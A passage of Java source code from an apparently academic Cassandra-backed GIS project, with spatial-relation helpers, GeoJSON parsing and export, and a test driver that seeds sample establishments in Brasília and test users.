                    System.out.println(geo.getId()+" "+geo2.getId());
                    lista.add(geo);
                    //j=lista_geo.size();
                }
                if (Dentro(geo2.getGeometria(),geo.getGeometria())){
                    System.out.println(geo2.getId()+" "+geo.getId());
                    lista.add(geo2);
                    //j=lista_geo.size();
                }
            }
        }
        return Geometry2GeoJson(lista,null);
    }
    // Debug helper: dumps every 2D vertex of the polygon to stdout.
    public static void MostrarPontos(Polygon c){
        Point2D[] p2d;
        Point2D p2;
        int x;
        p2d=c.getCoordinates2D();
        System.out.println("p2d.length: "+String.valueOf(p2d.length));
        for(x=0;x<p2d.length;x++){
            p2=p2d[x];
            System.out.println("p2: "+String.valueOf(p2.x)+" "+String.valueOf(p2.y));
        }System.out.println();
    }
    // Debug helper: prints the geometry's 2D length and area.
    public static void MostrarAreaDistancia(Geometry c){
        System.out.println("distancia: "+String.valueOf(c.calculateLength2D()) );
        System.out.println("area: "+String.valueOf(c.calculateArea2D()) );
        System.out.println();
    }
/****************************************************************************************/
//////////basico
    // True iff the geometries touch (ESRI Touches operator); logs the
    // verdict.  NOTE(review): SpatialReference.create(4326)'s result is
    // discarded here and in the sibling predicates — sr stays null.
    private static boolean Toca(Geometry a, Geometry b){
        SpatialReference sr = null;//= new SpatialReference();
        ProgressTracker pt = null;//= new ProgressTracker();
        SpatialReference.create(4326);
        boolean toca=false;
        if(a!=null && b!=null)
            toca = OperatorTouches.local().execute(a,b,sr,pt);
        else
            System.out.println("uma das geometrias é nula");
        if(toca){
            System.out.println("as geometrias se tocam");
            return true;
        }else{System.out.println("as geometrias NO se tocam");}
        return false;
    }
    // True iff `a` lies within `b` (ESRI Within operator); logs the verdict.
    private static boolean Dentro(Geometry a, Geometry b){
        // a inside b
        SpatialReference sr = null;//= new SpatialReference();
        ProgressTracker pt = null;//= new ProgressTracker();
        SpatialReference.create(4326);
        boolean dentro=false;
        if(a!=null && b!=null)
            dentro = com.esri.core.geometry.OperatorWithin.local().execute(a, b, sr, pt);
        else
            System.out.println("uma das geometrias é nula");
        if(dentro){
            System.out.println(" 1º ---> 2º");
            return true;
        }else{System.out.println(" 1º -/-> 2º");
        }
        return false;
    }
    // True iff the geometries cross (ESRI Crosses operator); logs the verdict.
    private static boolean Cruza(Geometry a, Geometry b){
        SpatialReference sr = null;//= new SpatialReference();
        ProgressTracker pt = null;//= new ProgressTracker();
        SpatialReference.create(4326);
        boolean cruza=false;
        if(a!=null && b!=null)
            cruza = OperatorCrosses.local().execute(a,b,sr,pt);
        else
            System.out.println("uma das geometrias é nula");
        if(cruza){
            System.out.println("as geometrias se cruzam");
            return true;
        }else{System.out.println("as geometrias NÃO se cruzam");}
        return false;
    }
    // True iff the geometries intersect (ESRI Intersects operator); logs
    // the verdict.
    private static boolean Intersecta(Geometry a, Geometry b){
        SpatialReference sr = null;//= new SpatialReference();
        ProgressTracker pt = null;//= new ProgressTracker();
        SpatialReference.create(4326);
        boolean intersecta=false;
        if(a!=null && b!=null)
            intersecta = OperatorIntersects.local().execute(a,b,sr,pt);
        else
            System.out.println("uma das geometrias é nula");
        if(intersecta){
            System.out.println("as geometrias se intersectam");
            return true;
        }else{System.out.println("as geometrias NÃO se intersectam");}
        return false;
    }
    // True iff the geometries are disjoint (ESRI Disjoint operator); logs
    // the verdict.
    private static boolean Disjunto(Geometry a, Geometry b){
        SpatialReference sr = null;//= new SpatialReference();
        ProgressTracker pt = null;//= new ProgressTracker();
        SpatialReference.create(4326);
        boolean disjunto=false;
        if(a!=null && b!=null)
            disjunto = OperatorDisjoint.local().execute(a,b,sr,pt);
        else
            System.out.println("uma das geometrias é nula");
        if(disjunto){
            System.out.println("as geometrias disjuntas");
            return true;
        }else{System.out.println("as geometrias juntas");}
        return false;
    }
    // True iff the geometries overlap (ESRI Overlaps operator); logs the
    // verdict.
    private static boolean Sobrepoe(Geometry a, Geometry b){
        SpatialReference sr = null;//= new SpatialReference();
        ProgressTracker pt = null;//= new ProgressTracker();
        SpatialReference.create(4326);
        boolean sobrepoe=false;
        if(a!=null && b!=null)
            sobrepoe = OperatorOverlaps.local().execute(a,b,sr,pt);
        else
            System.out.println("uma das geometrias é nula");
        if(sobrepoe){
            System.out.println("as geometrias se sobrepoe");
            return true;
        }else{System.out.println("as geometrias NÃO se sobrepoe");}
        return false;
    }
    // True iff `a` contains `b` (ESRI Contains operator); logs the verdict.
    private static boolean Contem(Geometry a, Geometry b){
        SpatialReference sr = null;//= new SpatialReference();
        ProgressTracker pt = null;//= new ProgressTracker();
        SpatialReference.create(4326);
        boolean contem=false;
        if(a!=null && b!=null)
            contem = OperatorContains.local().execute(a,b,sr,pt);
        else
            System.out.println("uma das geometrias é nula");
        if(contem){
            //A Contem B
            System.out.println("a geometria está contida");
            return true;
        }else{System.out.println("a geometria NÃO não está contida");}
        return false;
    }
/////////
//OK
//recebe um arquivo com caminho completo do tipo geojson
//ou recebe uma string contendo o geojson
//adiciona todos as geometrias no banco
    // Parses a GeoJSON document — `arquivo` may be a file path (with or
    // without a .geojson/.geo.json suffix) or the GeoJSON text itself —
    // into a list of Geo records.  Features without an id fall back to a
    // property-derived id; unknown geometry types abort with null.
    public List<Geo> GeoJson2Geometry(String arquivo) throws IOException, JSONException{
        String id=null;
        String type=null;
        String coordinates=null;
        Propriedade<String> properties= new Propriedade<String>();
        String geojson="";
        geo = null;
        Geometry geometry;
        List<Geo> lista_geo=new ArrayList<Geo>();
        BufferedReader buffer = null;
        // `arquivo` may be the GeoJSON string itself or a path to the file
        if(new File(arquivo+".geo.json").exists() || new File(arquivo+".geojson").exists()||new File(arquivo).exists()){
            if(new File(arquivo+".geojson").exists())
                buffer = new BufferedReader(new InputStreamReader(new FileInputStream(arquivo+".geojson"), "UTF-8"));
            //	buffer=new BufferedReader(new FileReader(arquivo+".geojson"));
            else if(new File(arquivo+".geo.json").exists())
                buffer = new BufferedReader(new InputStreamReader(new FileInputStream(arquivo+".geo.json"), "UTF-8"));
            else
                buffer = new BufferedReader(new InputStreamReader(new FileInputStream(arquivo), "UTF-8"));
            while(buffer.ready()){
                geojson+=buffer.readLine();
            }
            buffer.close();
        }else
            geojson=arquivo;
        if(geojson==null)
            throw new NullPointerException();
        // Strip formatting whitespace so features split cleanly on "},{".
        geojson = geojson.replaceAll( "\t", "" );
        geojson = geojson.replaceAll( "\n", "" );
        geojson = geojson.replaceAll( "\r", "" );
        geojson = geojson.replaceAll( "\f", "" );
        String[] geostrings=geojson.split("\\},\\{");
        //i=0=> {"type":"*Feature*Collection
        //i=1 => Collection","features":[\t{\t"type": "*Feature*
        for(int i=0; i<geostrings.length;i++){
            id=getId(geostrings[i]);
            type=getType(geostrings[i]);
            properties=getProperties(geostrings[i]);
            coordinates=getCoordinates(geostrings[i]);
            if(id==null){// fall back to another value for the id, e.g. "name", "nome", properties[2], properties[1]...
                if(properties.tamanho()==0){
                    //throw new NullPointerException("geometria sem id e sem propiedades");
                    //continue;// features without id and properties would be ignored
                    id="noid";
                    properties.put("properties", "null");
                }
                else if(properties.tamanho()==1){
                    switch(properties.getV()){
                    case "yes":
                        id=properties.getP();
                        break;
                    default :
                        id=properties.getV();
                        break;
                    }
                }
                else{
                    for(int j=0;j<properties.tamanho();j++){
                        if (properties.getP(j).equals("name")){id=properties.getV(j); j=properties.tamanho();}
                        else if(properties.getP(j).equals("nome")){id=properties.getV(j); j=properties.tamanho();}
                        else if(properties.getP(j).equals("highway")){id=properties.getP(j); j=properties.tamanho();}
                    }
                    if(id==null){id=properties.getV();} // take the first property
                }
            }
            //System.out.println("----------------IMPORT GEOJSON----------------\n"+geostrings[i]+"\n"+i+"\n"+id+"\n"+type+"\n\n");
            if(coordinates==null){
                System.err.println("Erro ao importar geojson: Coordenadas mau definidas.");
                return null;
            }else if(id==null){
                System.err.println("Erro ao importar geojson: id mau definido.");
                return null;
            }else if(type == null){
                System.err.println("Erro ao importar geojson: tipo mau definido.");
                return null;
            }else{
                ProgressTracker pt = null;
                geo=new Geo();
                // Map each GeoJSON type onto the corresponding ESRI import.
                switch(type){
                case "Point":
                    geo.setGeometria((Point) OperatorImportFromGeoJson.local().execute
                            (com.esri.core.geometry.GeoJsonImportFlags.geoJsonImportDefaults,
                                    Geometry.Type.Point, coordinates, pt).getGeometry());
                    break;
                case "LineString":
                    Polyline ls= (Polyline) OperatorImportFromGeoJson.local().execute
                            (com.esri.core.geometry.GeoJsonImportFlags.geoJsonImportDefaults,
                                    Geometry.Type.Polyline, coordinates, pt).getGeometry();
                    /*if(ls.getPathCount()>1){
                        System.err.println("geojson possui geometrias desconhecidas...");
                        return null;
                    }*/
                    geo.setGeometria(ls);
                    break;
                case "Polygon":
                    geometry=OperatorImportFromGeoJson.local().execute
                            (com.esri.core.geometry.GeoJsonImportFlags.geoJsonImportDefaults,
                                    Geometry.Type.Polygon, coordinates, pt).getGeometry();
                    Polygon pg= (Polygon)geometry;
                    /*if(pg.getPathCount()>1){
                        System.err.println("geojson possui geometrias desconhecidas...");
                        return null;
                    }*/
                    geo.setGeometria(pg);
                    break;
                case "MultiPoint":
                    geo.setGeometria((MultiPoint)OperatorImportFromGeoJson.local().execute
                            (com.esri.core.geometry.GeoJsonImportFlags.geoJsonImportDefaults,
                                    Geometry.Type.MultiPoint, coordinates, pt).getGeometry());
                    break;
                case "MultiLineString":
                    Polyline mls= (Polyline)OperatorImportFromGeoJson.local().execute
                            (com.esri.core.geometry.GeoJsonImportFlags.geoJsonImportDefaults,
                                    Geometry.Type.Polyline, coordinates, pt).getGeometry();
                    /*if(mls.getPathCount()<2){
                        System.err.println("geojson possui geometrias desconhecidas...");
                        return null;
                    }*/
                    geo.setGeometria(mls);
                    break;
                case "MultiPolygon":
                    Polygon mpg= (Polygon)OperatorImportFromGeoJson.local().execute
                            (com.esri.core.geometry.GeoJsonImportFlags.geoJsonImportDefaults,
                                    Geometry.Type.Polygon, coordinates, pt).getGeometry();
                    /*if(mpg.getPathCount()<2){
                        System.err.println("geojson possui geometrias desconhecidas...");
                        return;
                    }*/
                    geo.setGeometria(mpg);
                    break;
                default:
                    System.err.println("geojson possui geometrias desconhecidas..."+ type);
                    return null;
                }
            }
            geo.setTipo(type);
            geo.setPropriedades(properties);
            geo.setId(id);
            lista_geo.add(geo);
            //if (properties!=null)
            //properties.esvaziar();
        }
        return lista_geo;
    }
//OK
//Serializes a list of geometries into a GeoJSON FeatureCollection. The full
//document is returned as a String and, when 'path' is non-null, also written
//to disk: a path ending in "json" is used as the file name, anything else is
//treated as a directory and "out.geojson" is created inside it.
//NOTE: both the input list and each Geo's Propriedade container are consumed.
public String Geometry2GeoJson(List<Geo> lista, String path){
    String geojson = "{\"type\":\"FeatureCollection\",\"features\":[\n";
    List<String> geometrias = new ArrayList<String>();
    // Serialize every Geo that actually carries a geometry into one Feature.
    while (!lista.isEmpty()){
        Geo atual = lista.remove(0);
        if (atual.getGeometria() == null)
            continue; // skip entries without geometry (previously a stale/null
                      // string could still be pushed into the output list)
        if (atual.getTipo().equals("Line")){
            // "Line" is not a GeoJSON type: promote it to a single-path Polyline.
            Line linha = (Line) atual.getGeometria();
            Polyline promovida = new Polyline();
            promovida.startPath(linha.getStartX(), linha.getStartY());
            promovida.lineTo(linha.getEndX(), linha.getEndY());
            atual.setTipo("Polyline");
            atual.setGeometria(promovida);
        }
        String geometria = "{\"type\": \"Feature\",\"geometry\":";
        geometria += OperatorExportToGeoJson.local().execute(atual.getGeometria()) + ",";
        if (!atual.getPropriedades().vazio()){
            // Emit the key/value pairs; the Propriedade container is drained here.
            Propriedade<String> prop = atual.getPropriedades();
            geometria += "\"properties\": {";
            while (!prop.vazio()){
                geometria += "\"" + prop.getP() + "\":\"" + prop.getV() + "\"";
                prop.remove();
                if (!prop.vazio())
                    geometria += ",";
            }
            geometria += "}}";
        } else
            geometria += "}";
        geometrias.add(geometria);
    }
    // Assemble the complete document; commas are placed between the features
    // actually emitted, so a skipped entry can no longer leave a trailing comma.
    StringBuilder completo = new StringBuilder(geojson);
    for (int f = 0; f < geometrias.size(); f++){
        completo.append(geometrias.get(f));
        if (f != geometrias.size() - 1)
            completo.append(",");
        completo.append("\n");
    }
    completo.append("]}");
    String resultado = completo.toString();
    // Persist only when a destination was supplied. The original dereferenced
    // 'path' before its null checks, so the "return as string" mode crashed.
    if (path != null){
        String destino = path.endsWith("json") ? path : path + "\\out.geojson";
        try {
            BufferedWriter bufferedWriter = new BufferedWriter(
                    new OutputStreamWriter(
                            new FileOutputStream(destino), "utf-8"));
            try {
                bufferedWriter.write(resultado);
            } finally {
                bufferedWriter.close(); // close even when the write fails
            }
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
    return resultado;
}
//Persists every geometry of the list into the Cassandra store by delegating
//to BancoDados.InserirGeo, which consumes (empties) the list.
public void ImportarBanco(List<Geo> lista_geo){
    BancoDados.InserirGeo(lista_geo);
}
//Loads every geometry stored in the bank (select mode 0 = full scan of the
//geom_label table, no name filter).
//@throws ClassNotFoundException when the stored map column types cannot be resolved
public List<Geo> ExportarBanco() throws ClassNotFoundException, NullPointerException{
    return BancoDados.BuscarGeo(0,null);
}
//public Geo BuscarBanco(String nome) throws ClassNotFoundException, NullPointerException{
//return BancoDados.BuscarGeo(nome);
//}
//Returns the smallest '{'..'}' span that encloses the first "coordinates"
//key of the given GeoJSON fragment, or null when the key or its opening
//brace cannot be found.
private String getCoordinates(String geojson){
    int marcador = geojson.indexOf("\"coordinates\"");
    if(marcador==-1)
        return null;
    // Opening brace: nearest '{' at or before the key.
    int inicio = geojson.lastIndexOf('{', marcador);
    if(inicio<0)
        return null;
    // Closing brace: first '}' at or after the key (0 when absent, as before).
    int fim = 0;
    int fecha = geojson.indexOf('}', marcador);
    if(fecha!=-1)
        fim = fecha+1;
    return geojson.substring(inicio, fim);
}
//Extracts the value of the first "type" field. When that value is not one of
//the six GeoJSON geometry types (e.g. it was "Feature"), the search recurses
//past the match until a geometry type is found; returns null on malformed input.
private String getType(String geojson){
    int marcador = geojson.indexOf("\"type\"");
    if(marcador==-1)
        return null;
    // Position of the ':' that follows the key (0 means "not found").
    int inicio = 0;
    int pos = geojson.indexOf(':', marcador);
    if(pos!=-1)
        inicio = pos;
    if(inicio==0)
        return null;
    // First quote after the colon marks the start of the value.
    pos = geojson.indexOf('"', inicio);
    if(pos!=-1)
        inicio = pos+1;
    // Matching closing quote (0 when absent, as before).
    int fim = 0;
    pos = geojson.indexOf('"', inicio+1);
    if(pos!=-1)
        fim = pos;
    String tipo = geojson.substring(inicio, fim);
    switch(tipo){
        case "Point":
        case "LineString":
        case "Polygon":
        case "MultiPoint":
        case "MultiLineString":
        case "MultiPolygon":
            return tipo;
        default:
            // Not a geometry type: keep looking in the rest of the string.
            return getType(geojson.substring(marcador+4,geojson.length()));
    }
}
//Extracts the quoted value of the first "id" field of the GeoJSON fragment,
//or null when the field is missing or the value span is malformed.
String getId(String geojson){
    int marcador = geojson.indexOf("\"id\"");
    if(marcador==-1)
        return null;
    // Position of the ':' that follows the key (0 means "not found").
    int inicio = 0;
    int pos = geojson.indexOf(':', marcador);
    if(pos!=-1)
        inicio = pos;
    if(inicio==0)
        return null;
    // First quote after the colon marks the start of the value.
    pos = geojson.indexOf('"', inicio);
    if(pos!=-1)
        inicio = pos+1;
    // Matching closing quote (0 when absent, as before).
    int fim = 0;
    pos = geojson.indexOf('"', inicio+1);
    if(pos!=-1)
        fim = pos;
    try{
        return geojson.substring(inicio, fim);
    }
    catch(Exception e){
        // Malformed span (e.g. no closing quote): log and give up.
        e.printStackTrace();
        return null;
    }
}
//Parses the "properties" object of a GeoJSON feature into a Propriedade
//key/value container. Returns null when no "properties" object is found;
//entries whose key/value span cannot be delimited are silently skipped.
Propriedade<String> getProperties(String geojson){
    Propriedade<String> prop = new Propriedade<String>();;
    String propriedade;
    int x,indice=0,inicio=-1,fim=0;
    indice=geojson.indexOf("properties");
    if(indice==-1)
        return null;
    // Opening brace of the properties object (first '{' after the keyword).
    for(x=indice;x<geojson.length();x++){
        if(geojson.charAt(x)=='{'){
            inicio=x;
            x=geojson.length();
        }
    }
    if(inicio<0)
        return null;
    // Closing brace (first '}' after the keyword).
    // NOTE(review): this assumes property values contain no nested braces; confirm.
    for(x=indice;x<geojson.length();x++){
        if(geojson.charAt(x)=='}'){
            fim=x+1;
            x=geojson.length();
        }
    }
    String propriedades=geojson.substring(inicio, fim);
    // Normalize entry separators: first turn every ," into "," and then double
    // the quotes around the separator so that splitting on "","  isolates each
    // key:value pair even when values themselves contain commas.
    propriedades=propriedades.replaceAll(",\"", "\",\"");
    propriedades=propriedades.replaceAll("\",\"", "\"\",\"\"");
    String[] lista_prop=propriedades.split("\"\",\"");
    //String[] lista_prop=propriedades.split("\",\"");
    for(int i=0; i<lista_prop.length;i++){
        // The entry must look like "key":"value".
        indice=lista_prop[i].indexOf("\":\"");
        if(indice==-1)
            continue;
        // First quote delimits the start of the key.
        for(x=0;x<lista_prop[i].length();x++){
            if(lista_prop[i].charAt(x)=='"'){
                inicio=x;
                x=lista_prop[i].length();
            }
        }
        if(inicio<0)
            continue;
        /*for(x=inicio+1;x<lista_prop[i].length();x++){
            if(lista_prop[i].charAt(x)=='"'){
                fim=x+1;
                x=lista_prop[i].length();
            }
        }*/
        propriedade=lista_prop[i].substring(inicio+1, indice);
        // Last quote of the entry delimits the end of the value.
        for(x=lista_prop[i].length()-1;x>=0;x--){
            if(lista_prop[i].charAt(x)=='"'){
                fim=x;
                x=-1;
            }
        }
        if(fim<0)
            continue;
        /*for(x=fim-1;x>=0;x--){
            if(lista_prop[i].charAt(x)=='"'){
                inicio=x;
                x=-1;
            }
        }*/
        try{
            // +3 skips the "":"  separator between key and value.
            prop.put(propriedade,lista_prop[i].substring(indice+3, fim));
        }
        catch(Exception e){
            e.printStackTrace();
        }
    }
    return prop;
}
//Writes the given GeoJSON document to 'path' encoded as UTF-8, matching the
//explicit "utf-8" encoding used elsewhere in this class (the original used
//String.getBytes() with the platform default charset). The stream is closed
//even when the write fails; I/O errors are logged and swallowed, as in the
//rest of this class.
public void SalvarGeoJson(String path,String geojson){
    try (FileOutputStream fos = new FileOutputStream(path)) {
        // UnsupportedEncodingException is an IOException and is caught below.
        fos.write(geojson.getBytes("utf-8"));
    } catch (FileNotFoundException e) {
        e.printStackTrace();
    } catch (IOException e) {
        e.printStackTrace();
    }
}
}<file_sep>/BDGCassandra/src/Cassandra/gis/geoprocessing/GettingStarted.java
package Cassandra.gis.geoprocessing;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.util.ArrayList;
import java.util.List;
import java.util.UUID;
import org.json.JSONException;
import com.esri.core.geometry.Geometry;
import com.esri.core.geometry.Line;
import com.esri.core.geometry.Point;
import com.esri.core.geometry.Point2D;
import com.esri.core.geometry.Polygon;
import com.esri.core.geometry.Polyline;
import com.esri.core.geometry.MultiPoint;
import com.esri.core.geometry.ProgressTracker;
import com.esri.core.geometry.SpatialReference;
import Cassandra.gis.db.BDgeo;
import Cassandra.gis.db.Geo;
import Cassandra.gis.db.Propriedade;
import Cassandra.servico.consultaopiniao.BD;
import Cassandra.servico.consultaopiniao.Estabelecimento;
//Manual driver / smoke-test harness for the geographic database. It exercises
//the opinion-poll tables (testeBD), the geometry operators (testeOperadores),
//geometry storage (testeBDgeo), GeoJSON import/export and the geospatial
//queries. Hosts and file paths are hard-coded for a local single-node
//Cassandra instance and a developer machine.
public class GettingStarted {
    private static Funcoes func;     // geoprocessing facade over the "geometry" keyspace
    private static BD BancoDados;    // opinion-poll database (used by testeBD only)
    // No state to set up; everything is static.
    public GettingStarted() {
    }
    //Entry point: connects to the local cluster, runs the currently enabled
    //scenario (the others are kept commented out) and prints rough timings.
    public static void main(String[] args){
        func= new Funcoes(new BDgeo("127.0.0.1", "geometry"));
        // NOTE(review): millis truncated into a float loses precision; confirm
        // before trusting the printed timings.
        float antes=System.currentTimeMillis();
        System.out.println("antes: "+System.currentTimeMillis()/1000);
        /* for(int i=0;i<12;i++){
            ImportarGeoJson("C:\\Users\\Acer\\Desktop\\testeGeoJson\\df\\df"+String.valueOf(i)+".geojson");
        }
        ExportarGeometria("C:\\Users\\Acer\\Desktop\\testeGeoJson\\df\\df.geojson");
        System.out.println((float)(System.currentTimeMillis()-antes)/1000+"segundos de busca no banco");
        System.out.println(System.currentTimeMillis()/1000+"segundos de exportação do banco");
        testeBD();
        testeOperadores();
        testeBDgeo();
        */
        funcoes_geoespaciais();
        System.out.println((float)(System.currentTimeMillis()-antes)/1000+"segundos de inserção no banco");
    }
    //Populates the opinion-poll keyspace with sample establishments (schools
    //and hospitals around Brasília), their evaluation questions and a few
    //users; the bulk evaluation-insert benchmark is currently disabled.
    public static void testeBD(){
        BancoDados= new BD();
        int x;
        UUID y,z;
        List <UUID> yy = new ArrayList <UUID>();
        List <UUID> zz = new ArrayList <UUID>();
        y = UUID.randomUUID();yy.add(y);
        BancoDados.inserirEstabelecimento(y, -15.79225, -47.83938, "Hospital", "Minha localizacao");y = UUID.randomUUID();yy.add(y);
        BancoDados.inserirEstabelecimento(y, -15.767938, -47.874228, "Escola", "Centro de Ensino Medio Asa Norte");y = UUID.randomUUID();yy.add(y);
        BancoDados.inserirEstabelecimento(y, -15.808065, -47.909539, "Escola", "Centro de Ensino Medio Elefante Branco");y = UUID.randomUUID();yy.add(y);
        BancoDados.inserirEstabelecimento(y, -15.7830155, -47.938376, "Escola", "Centro Educacional 01 do Cruzeiro");y = UUID.randomUUID();yy.add(y);
        BancoDados.inserirEstabelecimento(y, -15.796561, -47.938454, "Escola", "Centro Educacional 02 do Cruzeiro Novo");y = UUID.randomUUID();yy.add(y);
        BancoDados.inserirEstabelecimento(y, -15.827537, -47.917211, "Escola", "Centro de Ensino Fundamental 04 de Brasilia");y = UUID.randomUUID();yy.add(y);
        BancoDados.inserirEstabelecimento(y, -15.75597, -47.87861, "Escola", "Centro de Ensino Medio Paulo Freire");y = UUID.randomUUID();yy.add(y);
        BancoDados.inserirEstabelecimento(y, -15.82669, -47.92002, "Hospital", "Hospital Geral de Brasilia");y = UUID.randomUUID();yy.add(y);
        BancoDados.inserirEstabelecimento(y, -15.82382, -47.897158, "Hospital", "Hospital Regional da Asa Sul");y = UUID.randomUUID();yy.add(y);
        BancoDados.inserirEstabelecimento(y, -15.800837, -47.888676, "Hospital", "Hospital de Base do Distrito Federa");y = UUID.randomUUID();yy.add(y);
        BancoDados.inserirEstabelecimento(y, -15.772453, -47.873429, "Hospital", "Hospital Universitário de Brasilia");y = UUID.randomUUID();yy.add(y);
        BancoDados.inserirEstabelecimento(y, -15.785671, -47.882864, "Hospital", "Hospital Regional da Asa Norte");
        // Attach five standard evaluation questions to each establishment,
        // depending on whether it is a school or a hospital.
        for(x=0;x<yy.size();x++){
            Estabelecimento est=BancoDados.buscarEstabelecimento(yy.get(x));
            if(est.getDescricao().equals("Escola")){
                BancoDados.inserirTipoAvaliacao (yy.get(x),"Escola", "Qual sua nota para o atendimento desta escola?");
                BancoDados.inserirTipoAvaliacao (yy.get(x),"Escola", "Qual sua nota para os profissionais desta escola?");
                BancoDados.inserirTipoAvaliacao (yy.get(x),"Escola", "Qual sua nota para a limpeza desta escola?");
                BancoDados.inserirTipoAvaliacao (yy.get(x),"Escola", "Qual sua nota para a organização desta escola?");
                BancoDados.inserirTipoAvaliacao (yy.get(x),"Escola", "Qual sua nota para a pontualidade dos profissionais desta escola?");
            }
            else if(est.getDescricao().equals("Hospital")){
                BancoDados.inserirTipoAvaliacao (yy.get(x),"Hospital", "Qual sua nota para o atendimento deste hospital?");
                BancoDados.inserirTipoAvaliacao (yy.get(x),"Hospital", "Qual sua nota para os profissionais deste hospital?");
                BancoDados.inserirTipoAvaliacao (yy.get(x),"Hospital", "Qual sua nota para a limpeza deste hospital?");
                BancoDados.inserirTipoAvaliacao (yy.get(x),"Hospital", "Qual sua nota para a organização deste hospital?");
                BancoDados.inserirTipoAvaliacao (yy.get(x),"Hospital", "Qual sua nota para a pontualidade dos profissionais deste hospital?");
            }
        }
        // Generate a few UUIDs (the per-user insert below is disabled).
        for(x=0;x<11;x++){
            z = UUID.randomUUID();
            zz.add(z);
            //BancoDados.inserirUsuario("000.111.222-"+String.valueOf(x), String.valueOf(x)+String.valueOf(x+1)+String.valueOf(x+2), "Matheus"+String.valueOf(x), "<EMAIL>"+String.valueOf(x)+"@<EMAIL>");
        }
        BancoDados.inserirUsuario("000.111.222-1","senha", "Matheus", "<EMAIL>");
        BancoDados.inserirUsuario("000.111.222-2","senha", "Joao", "<EMAIL>");
        BancoDados.inserirUsuario("000.111.222-3","senha", "Maria", "<EMAIL>");
        BancoDados.inserirUsuario("000.111.222-4","senha", "Joana", "<EMAIL>");
        long antes =System.currentTimeMillis();
        System.out.println("antes: "+antes);
        // Bulk evaluation-insert benchmark; currently disabled (loop bound is 0).
        for(x=0;x<0;x++){
            BancoDados.inserirAvaliacao(yy.get(x%yy.size()),UUID.randomUUID(),"Escola n-"+String.valueOf(x),"Escola","Matheus"+String.valueOf(x),(((double)x+1)*0.5) % 5.0);
        }
        long depois =System.currentTimeMillis();
        System.out.println("antes: "+depois);
        System.out.println((float)(depois-antes)/1000+"segundos de inserçãono banco");
    }
    //Runs each spatial-relation operator (contains, crosses, disjoint,
    //intersects, overlaps, touches, within) over the fixture file and saves
    //each result as its own GeoJSON file.
    public static void testeOperadores(){
        System.out.println("start teste");
        func.InicializarTestes("C:\\Users\\Acer\\Desktop\\testeGeoJson\\teste.json");
        func.SalvarGeoJson("C:\\Users\\Acer\\Desktop\\testeGeoJson\\contem.json",func.testeContain());
        System.out.println("testeContain");
        func.SalvarGeoJson("C:\\Users\\Acer\\Desktop\\testeGeoJson\\cruza.json",func.testeCrosses());
        System.out.println("testeCrosses");
        func.SalvarGeoJson("C:\\Users\\Acer\\Desktop\\testeGeoJson\\disjunto.json",func.testeDisjoint());
        System.out.println("testeDisjoint");
        func.SalvarGeoJson("C:\\Users\\Acer\\Desktop\\testeGeoJson\\intersecta.json",func.testeIntersect());
        System.out.println("testeIntersect");
        func.SalvarGeoJson("C:\\Users\\Acer\\Desktop\\testeGeoJson\\sobrepoe.json",func.testeOverlap());
        System.out.println("testeOverlap");
        func.SalvarGeoJson("C:\\Users\\Acer\\Desktop\\testeGeoJson\\toca.json",func.testeTouch());
        System.out.println("testeTouch");
        func.SalvarGeoJson("C:\\Users\\Acer\\Desktop\\testeGeoJson\\dentro.json",func.testeWithin());
        System.out.println("testeWithin");
    }
    //Exercises storage of every supported geometric representation:
    /* point OK
     * line (1 line : 2 points) OK
     * polygon OK
     * multipoint OK
     * polyline (1~m) (m lines : n points) OK
     * multipolygon OK
     */
    public static void testeBDgeo(){
        try{
            // dedicated connection for this scenario
            BDgeo BancoDados= new BDgeo("127.0.0.1", "geometry");
            // test fixtures
            Point p= new Point(8.34,56.23);
            MultiPoint mp = new MultiPoint();
            Line l= new Line();
            Polyline pl = new Polyline();
            Polygon pg = new Polygon();
            Propriedade<String> propriedades= new Propriedade<String>();
            List<Geo> list_geo= new ArrayList<Geo>();
            Geo geo= new Geo();
            // propriedades.put("País", "Brasil");
            // propriedades.put("info","eu moro aki");
            // BancoDados.InserirGeo((float)9.5, "minha casa", propriedades);
            geo.setGeometria(p);
            geo.setId("minha casa");
            geo.setPropriedades(propriedades);
            list_geo.add(geo);
            // single point
            propriedades.put("País", "Brasil");
            propriedades.put("info","eu moro aki");
            BancoDados.InserirGeo(list_geo);
            list_geo.clear();
            geo.setGeometria(mp);
            geo.setId("meus vizinhos conhecidos");
            geo.setPropriedades(propriedades);
            list_geo.add(geo);
            // multipoint
            mp.add(new Point(9.0,9.0));
            mp.add(new Point(8.0,8.0));
            mp.add(new Point(7.0,7.0));
            mp.add(new Point(6.0,6.0));
            mp.add(new Point(5.0,5.0));
            propriedades.put("País", "Brasil");
            propriedades.put("info","eu moro aki");
            BancoDados.InserirGeo(list_geo);
            list_geo.clear();
            // line (two endpoints)
            geo.setGeometria(l);
            geo.setId( "<NAME>");
            geo.setPropriedades(propriedades);
            list_geo.add(geo);
            l.setStart(p);
            l.setEnd(new Point(1.0, 1.0));
            propriedades.put("País", "Brasil");
            propriedades.put("info","eu moro aki");
            propriedades.put("comprimento de b1", String.valueOf(l.calculateLength2D()));
            BancoDados.InserirGeo(list_geo);
            list_geo.clear();
            geo.setGeometria(pl);
            geo.setId("meu quarteirão");
            geo.setPropriedades(propriedades);
            list_geo.add(geo);
            // polyline with four paths
            pl.startPath(0.0,1.0);pl.lineTo(0.0,2.0);pl.lineTo(0.0,3.0);
            pl.startPath(1.0,1.0);pl.lineTo(1.0,2.0);pl.lineTo(1.0,3.0);
            pl.startPath(0.0,4.0);pl.lineTo(0.0,5.0);pl.lineTo(0.0,6.0);
            pl.startPath(1.0,4.0);pl.lineTo(1.0,5.0);pl.lineTo(1.0,6.0);
            propriedades.put("País", "Brasil");
            propriedades.put("info","eu moro aki");
            propriedades.put("comprimento: ",String.valueOf(pl.calculateLength2D()));
            BancoDados.InserirGeo(list_geo);
            list_geo.clear();
            geo.setGeometria(pg);
            geo.setId("minha quadra");
            geo.setPropriedades(propriedades);
            list_geo.add(geo);
            // polygon with two rings
            pg.startPath(0.0,0.0);pg.lineTo(0.0,2.0);pg.lineTo(2.0,2.0);pg.lineTo(2.0,0.0);
            pg.startPath(2.0,0.0);pg.lineTo(2.0,2.0);pg.lineTo(4.0,2.0);pg.lineTo(4.0,0.0);
            propriedades.put("País", "Brasil");
            propriedades.put("info","eu moro aki");
            propriedades.put("comprimento: ",String.valueOf(pg.calculateLength2D()));
            propriedades.put("area: ",String.valueOf(pg.calculateArea2D()));
            BancoDados.InserirGeo(list_geo);
